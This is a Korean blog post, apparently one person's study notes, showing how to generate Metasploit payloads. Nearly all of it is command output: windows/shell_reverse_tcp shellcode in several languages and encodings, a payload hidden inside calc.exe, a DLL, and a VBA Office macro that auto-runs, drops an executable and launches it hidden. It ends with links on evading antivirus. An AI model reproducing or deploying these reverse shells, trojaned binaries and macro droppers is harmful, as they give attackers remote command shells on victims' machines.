http://www.offensive-security.com/metasploit-unleashed/Metasploit_Generating_Payloads
root@LUCKYSTRIKE:~# msfpayload -h
Usage: /usr/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>
OPTIONS:
-h Help banner
-l List available payloads |
root@LUCKYSTRIKE:~# msfencode -h
Usage: /usr/metasploit/msf3/msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-d <opt> Specify the directory in which to look for EXE templates
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-p <opt> The platform to encode for
-s <opt> The maximum size of the encoded data
-t <opt> The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
-v Increase verbosity
-x <opt> Specify an alternate executable template |
root@LUCKYSTRIKE:~# msfencode -l
Framework Encoders
==================
Name Rank Description
---- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder
php/base64 great PHP Base64 encoder
ppc/longxor normal PPC LongXOR Encoder
ppc/longxor_tag normal PPC LongXOR Encoder
sparc/longxor_tag normal SPARC DWORD XOR Encoder
x64/xor normal XOR Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
|
payload 만드는데 필요한 명령 두가지와 encoder 리스트입니다.
msfpayload만 쓰셔도 되지만 특이한 경우에는 msfenocde도 사용해야하기 때문에 둘 다 언급했습니다.
다음은 msfpayload 명령을 사용해서 payload를 만드는 방식에 대한 예제입니다.
payload는 개인적으로 좋아라하는 windows/shell_reverse_tcp를 사용했습니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 S
Name: Windows Command Shell, Reverse TCP Inline
Module: payload/windows/shell_reverse_tcp
Version: 8642
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 314
Rank: Normal
Provided by:
vlad902 <vlad902@gmail.com>
sf <stephen_fewer@harmonysecurity.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.126.146 yes The listen address
LPORT 9999 yes The listen port
Description:
Connect back to attacker and spawn a command shell |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 C
/*
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
* ReverseConnectRetries=5, EXITFUNC=process,
* InitialAutoRunScript=, AutoRunScript=
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x68\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56"
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3"
"\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24"
"\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56"
"\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89"
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0"
"\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80"
"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"; |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 P
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" .
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" .
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" .
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" .
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" .
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" .
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" .
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" .
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" .
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" .
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" .
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" .
"\x6f\x6a\x00\x53\xff\xd5"; |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 y
# windows/shell_reverse_tcp - 314 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f" +
"\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29" +
"\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50" +
"\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7\x68" +
"\xc0\xa8\x7e\x92\x68\x02\x00\x27\x0f\x89\xe6\x6a\x10\x56" +
"\x57\x68\x99\xa5\x74\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5" |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 R | msfencode -b '\x00'
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
buf =
"\xb8\x9e\x0b\x64\x4f\xdb\xdf\xd9\x74\x24\xf4\x5b\x33\xc9" +
"\xb1\x4f\x83\xc3\x04\x31\x43\x10\x03\x43\x10\x7c\xfe\x98" +
"\xa7\x09\x01\x61\x38\x69\x8b\x84\x09\xbb\xef\xcd\x38\x0b" +
"\x7b\x83\xb0\xe0\x29\x30\x42\x84\xe5\x37\xe3\x22\xd0\x76" +
"\xf4\x83\xdc\xd5\x36\x82\xa0\x27\x6b\x64\x98\xe7\x7e\x65" +
"\xdd\x1a\x70\x37\xb6\x51\x23\xa7\xb3\x24\xf8\xc6\x13\x23" +
"\x40\xb0\x16\xf4\x35\x0a\x18\x25\xe5\x01\x52\xdd\x8d\x4d" +
"\x43\xdc\x42\x8e\xbf\x97\xef\x64\x4b\x26\x26\xb5\xb4\x18" +
"\x06\x19\x8b\x94\x8b\x60\xcb\x13\x74\x17\x27\x60\x09\x2f" +
"\xfc\x1a\xd5\xba\xe1\xbd\x9e\x1c\xc2\x3c\x72\xfa\x81\x33" +
"\x3f\x89\xce\x57\xbe\x5e\x65\x63\x4b\x61\xaa\xe5\x0f\x45" +
"\x6e\xad\xd4\xe4\x37\x0b\xba\x19\x27\xf3\x63\xbf\x23\x16" +
"\x77\xb9\x69\x7f\xb4\xf7\x91\x7f\xd2\x80\xe2\x4d\x7d\x3a" +
"\x6d\xfe\xf6\xe4\x6a\x01\x2d\x50\xe4\xfc\xce\xa0\x2c\x3b" +
"\x9a\xf0\x46\xea\xa3\x9b\x96\x13\x76\x0b\xc7\xbb\x29\xeb" +
"\xb7\x7b\x9a\x83\xdd\x73\xc5\xb3\xdd\x59\x70\xf4\x4a\xa2" +
"\x2b\x84\x18\x4a\x2e\x78\x3a\x84\xa7\x9e\x2e\x8a\xe1\x09" +
"\xc7\x33\xa8\xc1\x76\xbb\x66\x41\x1a\x2e\xed\x91\x55\x53" +
"\xba\xc6\x32\xa5\xb3\x82\xae\x9c\x6d\xb0\x32\x78\x55\x70" +
"\xe9\xb9\x58\x79\x7c\x85\x7e\x69\xb8\x06\x3b\xdd\x14\x51" +
"\x95\x8b\xd2\x0b\x57\x65\x8d\xe0\x31\xe1\x48\xcb\x81\x77" +
"\x55\x06\x74\x97\xe4\xff\xc1\xa8\xc9\x97\xc5\xd1\x37\x08" +
"\x29\x08\xfc\x38\x60\x10\x55\xd1\x2d\xc1\xe7\xbc\xcd\x3c" +
"\x2b\xb9\x4d\xb4\xd4\x3e\x4d\xbd\xd1\x7b\xc9\x2e\xa8\x14" +
"\xbc\x50\x1f\x14\x95" |
R 옵션은 Raw 형태로 출력하라는 옵션이라서 인코딩을 하지 않으면 아래와 같이 나옵니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J
// windows/shell_reverse_tcp - 314 bytes
// http://www.metasploit.com
// VERBOSE=false, LHOST=192.168.126.146, LPORT=9999,
// ReverseConnectRetries=5, EXITFUNC=process,
// InitialAutoRunScript=, AutoRunScript=
%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%ua8c0%u927e%u0268%u2700%u890f%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff |
JavaScript 형태는 인코딩하면 사이즈가 4배 정도 늘어납니다.
type이 js_le와 js_be가 있는데 차이가 없더군요..둘의 차이점은....좀 더 알아봐야 할 듯...-_-;;
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 J | msfencode -t js_le
[*] x86/shikata_ga_nai succeeded with size 1183 (iteration=1)
%u7db8%u9a64%udb2b%ud9c1%u2474%u5ef4%uc929%ub966%u0121%u4631%u8316%u04c6%u4603%u9f12%ub591%u7f04%ua32d%u1b34%u44be%uccba%uc333%u7e59%u4cd8%u1bd0%u1656%u9066%u87f3%u35f2%u178c%u99d6%u695f%uf91c%uf0fd%u9c28%u0972%u71fe%u6555%uf974%u4fe5%u2e5b%uc771%u1ed4%u4210%u3f6f%ufc99%ud0e3%u8934%u4dd5%u1ca8%ube20%uff19%u8562%ubd37%u56c5%u7cfd%u39bc%u0d91%u9525%ube49%uaaed%u6ada%u05d3%ua0e4%u5405%ufd20%ua777%ucb7e%uf6a9%u054a%ud89a%u39fe%u4aad%u84ab%u5308%uce6a%u8346%u1f86%ue3b8%u3ac4%u86b0%ub79a%u0b59%u5634%ueecc%ud2a9%u9542%u6959%u300a%ub0d1%u96f9%u8e35%uaf59%u5661%u610f%u6bc9%u0fdf%uf0a2%u9c7a%udb4f%u68a4%u0c9f%u2585%u3bb1%udcb1%ud02c%u6b78%u47db%ue629%ucb4d%u7aae%u9bfb%u4744%u7bd7%uc2e4%u1353%u59b4%ub8f2%ud35b%u4f63%u2ee8%u8a7e%u3565%ub246%u90e6%u0ac3%ue2d9%u4e12%u226c%ua055%u67be%uf8e0%u5187%udc3a%uae82%u7b0b%uf558%ub51e%u9196%u9cd2%u6ca3%ue721%uab29%u2f30%u80cc%u6a8a%ud665%u4189%u33b7%u9f3b%u0385%ufaa1%u4b9c%u3447%u8e6b%u04f2%ue7ab%u4dce%u65be%ube18%u4c26%u8c13%uba90%ud5ba%ua4a9%u255a%u0d63%u2ad6%u7eb3%u8829%ub3c6%ub32a%u964b%u04d9%ueeef%u4e10%u3c9a%ua030%u6556%ua3c3%u57a7%u011b%ua7bd%u2a3f%ue25b%ucfca%udc94%u3505%u7aae%u5056%ua762%uafe3%u92b5%uf539%ue9cc%ucd0f%u344c%u1505%u07f3%u40d5%u5486%ubf76%ubf5a%udb0d%u8faa%u06dc%udbbe%u712e%u0622%ub93a%u7f97%u9cfc%u48a2%ubdc8%u937c%u7245%uef4c%u57c4%u3adb%ufc37%u6113%uc842%u516b%u15ce%u99f9%u676c%ufc39%ub505%ucb09%u9cdd%u571c%uef2d%ub2ef%u3c24%ud973%u67f5%u1906%u5398%u7cd1%ua429%u4d43%uf1e5%ud5f6%uca33%u30c9%u4c49%u094c%ub580%u0ee5%u86d2%uf534%u8a67%u9407%u69e4%u661d%u128f%ua3bb%ub63a%u9b74%u1df5%ube0e%u6ec5%u65c8%uf753%u521c%ud2ae%uab29%u2cb4%uf6e1%u7e41%u9e67%ua591%u6c12%u92d6%ub5b8%ub863%u8272%u67be%ud406%u52a2%u01d0%uaf56%u7c14%ueaa0%u1a21%uc4e3%uc7f8%u1d76%u3199%u784f%u0928%ub2cd%u54b1%u8664%uae0d%ucde4%ufe18%u3cd9%udb80%u076c%u4724%u52bc%ubfdd%uaca0%u9a29%ua951%ud461%u14a8%u20f7%u6eff%u6dce%ubc8a%u5f04%ue440%uaa11%ud3ca%uf1bb%u297f%ucf05%u744e%u1a00%u4380%u418b%uce97%uef7b%u3431%uda09%u03db%u01c9%u5451%u7c4b%u81f8%u1bfe%uf898%uc632%uce29%u3056%u15e4%u73e2%u603b%u5634%ubc4e%uab74%u9982%ufd01%ud1da%u24d9%u256e%u1129%u6ca7%u6838%u5da1%ub7f0%u9458%u82cc%ufd96%udb59%uc9e1%u06c2%u027b%u7a32%u47b5%u1e49%ue18c%ufbd7%ud49b%u6127%u025c%u553d%u7cac%ub08c%u4eb9%u8ad7%u8a71%udf52%ub745%u3aa8%u01d3%u71e9%u4b2b%u417c%ua17b%u9447%uf50e%ue087%ud092%u6892%u7d66%u553b%ub4fd%ua0f3%u93cd%uff86%ue91d%uda58%u2428%u10a9%u63e3%u6dbc%u5833%ua80e%uc546%u840f%u2090%u8ca5%u1a86%u6923%u3d32%u14cd%ue48c%uee64%u82d5%u2bb3%u7d53%u5084%ua4ac%uf781%uc5ea%ud259%u337f%u2ba8%u66e5%u63b9%u5ed7%ua679%uad62%u984e%uf4bc%ue0c5%uc685%u3543%u1083%u50ed%u785d%uaf98%ub397%uea52%u85a2%uc1aa%ucf7b%u48bf%u36b1%uaf79%u7ecc%u9848%u5a1a%u82df%uc257%u6f79%u3ced%u59b5%u6435%u93cc%u5071%ufe4a%ua40c%u30ab%uf1df%u05be%u9f28%u4073%u6a23%ubf43%ub1fc%ud9de%u8934%u0011%udc4c%u7c63%u3bcf%ub5f1%u7139%u90c0%u1f30%ubf56%ufa88%u5ce3%u32da%u873a%u0951%uf376%u48ad%ucb03%ua1fc%u0e88%ufd8a%u602a%udb45%ub2c7%u1791%u971c%u34ac%ue66a%u9e7e%u3ce7%ud04b%u1937%u25c6%u5408%u631c%ua31d%u5e6a%ueeeb%u94e7%uc525%uf031%u113c%ucf5b%u7c88%u1ad6%u4bc3%u402e%u865e%ubf78%ucd93%u88f1%u3bea%ud3c2%u7079%u7f54%u53e1%u19ed%ua383%uc33b%ueb3e%u6f7a%u2ef4%u5b08%u5593%u86c2%ua12e%ufc14%uece6%ucd2d%u8836%u14ab%u6442%u610c%ua194%ubc19%u9180%u9bd6%u873d%ud27e%u628d%u780a%u088c%u59c1%ub225%uc41c%u17f5%u3d2a%u36c0%u18e6%ud959%u5530%u3c99%ufb48%u07bd%ude87%u1148%u1981%uf8d7%u6938%u6674%ua8f6%u510f%u829b%ub8d9%udb2e%uf215%u3eb1%u9723%u2701%u72a9%u9717%u4b18%uf2e2%u8717%u9f3b%uc2b5%u6836%u3d08%ub38a%u0b19%u8d8d%u5687%uc738%ua874%u02f2%uac0e%u2ac7%u4196
|
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -o reverse_shell
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 73831 (iteration=1) |
type을 exe 형태로 지정해서 파일로 떨궈볼려고 했는데 안되더군요..너무 작다는 메시지만 계속 뿌립니다.
인코딩을 하지 않으면 PE 포맷 형태로 나오긴 합니다만...뭔가 다른 방법이 있을듯 합니다.
(일단 포스팅하고 삽질을 좀 더 해봐야할 듯...)
위 문제점은 아래 방법으로 해결했습니다. 히히
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 X | msfencode -t exe -x calc.exe -k -o reverse_shell.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)
|
http://carnal0wnage.attackresearch.com/2010/03/msfencode-msfpayload-into-existing.html
-x 옵션은 지정된 템플릿을 바탕으로 실행 파일을 만들게끔 해줍니다. -k 옵션과 함께 사용해야 하며
-x 옵션 뒤에 디렉토리를 따로 지정하지 않으면 metasploit 설치 디렉토리 하위에 data/templates에 지정한 파일(calc.exe)가 있어야 합니다.
참고했던 위 페이지에서 처럼 실행해봤더니 잘 실행됨을 확인할 수 있었습니다. ㅎㅎ
msfencode에 대한 더 많은 삽질이 필요할 듯 합니다.
좀 더 알게되면 추가 포스팅해야겠습니다.
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 D | msfencode -o reverse_shell.dll -t dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[*] x86/shikata_ga_nai succeeded with size 14365 (iteration=1) |
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 V
&H00&...(snip)...H00&
'Created by msfpayload (http://www.metasploit.com).
'Payload: windows/shell_reverse_tcp
' Length: 314
'Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
'**************************************************************
'*
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'*
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************
Sub Auto_Open()
Bntml12
End Sub
Sub Bntml12()
Dim Bntml7 As Integer
Dim Bntml1 As String
Dim Bntml2 As String
Dim Bntml3 As Integer
Dim Bntml4 As Paragraph
Dim Bntml8 As Integer
Dim Bntml9 As Boolean
Dim Bntml5 As Integer
Dim Bntml11 As String
Dim Bntml6 As Byte
Dim Ilbpdhngga as String
Ilbpdhngga = "Ilbpdhngga"
Bntml1 = "qGPLaRGNNbzhDLG.exe"
Bntml2 = Environ("USERPROFILE")
ChDrive (Bntml2)
ChDir (Bntml2)
Bntml3 = FreeFile()
Open Bntml1 For Binary As Bntml3
For Each Bntml4 in ActiveDocument.Paragraphs
DoEvents
Bntml11 = Bntml4.Range.Text
If (Bntml9 = True) Then
Bntml8 = 1
While (Bntml8 < Len(Bntml11))
Bntml6 = Mid(Bntml11,Bntml8,4)
Put #Bntml3, , Bntml6
Bntml8 = Bntml8 + 4
Wend
ElseIf (InStr(1,Bntml11,Ilbpdhngga) > 0 And Len(Bntml11) > 0) Then
Bntml9 = True
End If
Next
Close #Bntml3
Bntml13(Bntml1)
End Sub
Sub Bntml13(Bntml10 As String)
Dim Bntml7 As Integer
Dim Bntml2 As String
Bntml2 = Environ("USERPROFILE")
ChDrive (Bntml2)
ChDir (Bntml2)
Bntml7 = Shell(Bntml10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************
Ilbpdhngga
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&...(snip)...
|
너무 길게 나와서 앞뒤로 짤랐습니다.
파일로도 떨궈 봤는데 사이즈가 상당히 크더군요..
root@LUCKYSTRIKE:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.126.146 LPORT=9999 W | msfencode -b '\x00'
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
Length: 314
Options: {"LHOST"=>"192.168.126.146", "LPORT"=>"9999"}
[-] x86/shikata_ga_nai failed: Encoding failed due to a bad character (index=194, char=0x00)
[*] php/base64 succeeded with size 91691 (iteration=1)
buf =
"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65" +
"\x63\x6f\x64\x65\x28\x55\x45\x73\x44\x42\x42\x51\x41\x41" +
"\x41\x41\x49\x41\x4c\x35\x31\x4c\x45\x41\x62\x64\x7a\x76" +
"\x6b\x52\x77\x41\x41\x41\x45\x63\x41\x41\x41\x41\x55\x41" +
"\x41\x41\x41\x54\x55\x56\x55\x51\x53\x31\x4a\x54\x6b\x59" +
"\x76\x54\x55\x46\x4f\x53\x55\x5a\x46\x55\x31\x51\x75\x54" +
...(snip)... |
war 형태로 type을 war로 지정하고 했더니 exe 형태일때랑 동일한 에러메시지가 떠서 인코딩했더니 상당히 길게 나오네요..
항상 msfpayload만 가지고 간단한 쉘코드만 작성해서 사용해봤었는데 msfencode와 같이 사용하면 꽤 괜찮다는 생각이 듭니다.
다만, msfencode로 인코딩한 파일을 제가 사용하는 빨간우산은 악성코드로 잡더군요..
바이러스토탈에 올려보니 무려 23개의 백신에서 탐지하고 있었습니다.
좀 더 공부해봐야 알겠지만 인코더나 옵션 조정하면 백신에 탐지 안되게 할 수도 있지 않을까요? 흠...
우회 관련된 참고할만한 자료
Using msfpayload and msfencode from Metasploit 3.3 to bypass anti-virus
http://www.irongeek.com/i.php?page=videos/msfpayload-msfencoder-metasploit-3-3
0x02 안티바이러스 피해가기
http://linux-virus.springnote.com/pages/4330985?print=1